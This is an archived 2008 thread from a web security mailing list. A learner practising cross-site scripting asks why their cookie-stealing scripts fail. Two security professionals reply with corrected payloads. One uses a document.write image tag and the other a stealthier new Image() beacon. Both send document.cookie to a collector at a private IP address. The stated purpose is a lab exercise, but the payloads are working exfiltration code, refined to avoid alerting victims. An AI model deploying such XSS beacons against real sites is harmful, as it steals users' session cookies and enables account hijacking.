[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [WEB SECURITY] XSS Help

From: "Hoffman, Billy" <billy.hoffman@xxxxxx>
Subject: RE: [WEB SECURITY] XSS Help
Date: Thu, 5 Jun 2008 20:50:18 +0000

[evil hat on]
No reason to write new a DOM element simply to blindly beacon some data back to the attacker. DOM operations are slow and this would create a broken image looking thing that might alert a victim unless you returned a true image. Instead use:

<script>
var img = new Image();
img.src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="; + document.cookie;
</script>

Billy Hoffman
--
Manager, HP Web Security Research Group
HP Software - Application Security Center
Direct:  770-343-7069

From: Ryan Barnett [mailto:rcbarnett@xxxxxxxxx]
Sent: Thursday, June 05, 2008 11:03 AM
To: GsNaseer Gs
Cc: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] XSS Help

A few notes -

1) The correct term for the DOM variable is document.cookie instead of document.cookies - drop the "s" at the end.
2) You need to use proper syntax within the javascript to dynamically place the value of the document.cookie data into the new url.  This means that you need to play around with single and double quotes.  Try the javascript below and see if it works for you -

<script>document.write('<img src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck='+document.cookie+'"')</script>

--
Ryan C. Barnett
ModSecurity Community Manager
Breach Security: Director of Application Security
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
Author: Preventing Web Attacks with Apache


On Thu, Jun 5, 2008 at 9:20 AM, GsNaseer Gs <gsnas29@xxxxxxxxxxx> wrote:
Hi!

I am new to this forum, I was practising to learn to concepts of XSS(Cross-Site-Scripting), I am using two different applications on two different machines. i want to dump cookies of one application into another application database. For that i am using
this script to send cookies,

<script src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+document.cookies>

<script src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+escape(document.cookies)>

<script>new Image().src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+encodeURI(document.cookies)</script>

/*Non of these scripts are working for me*/

i am able to dump a blank record without any cookies values (null) , i am trying out this on IE 7

pls can anybody help me, and guide to through where i am wrong........


Thanks





________________________________________
Best Jokes, Best Friends, Best Food. Get all this and more on Best of Yahoo! Groups.




----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

References:
- [WEB SECURITY] XSS Help
  - From: GsNaseer Gs
- Re: [WEB SECURITY] XSS Help
  - From: Ryan Barnett

Prev by Date: Re: [WEB SECURITY] XSS Help
Next by Date: RE: [WEB SECURITY] quick question on password reset 'best practices'
Previous by thread: Re: [WEB SECURITY] XSS Help
Next by thread: [WEB SECURITY] CSRF Help
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site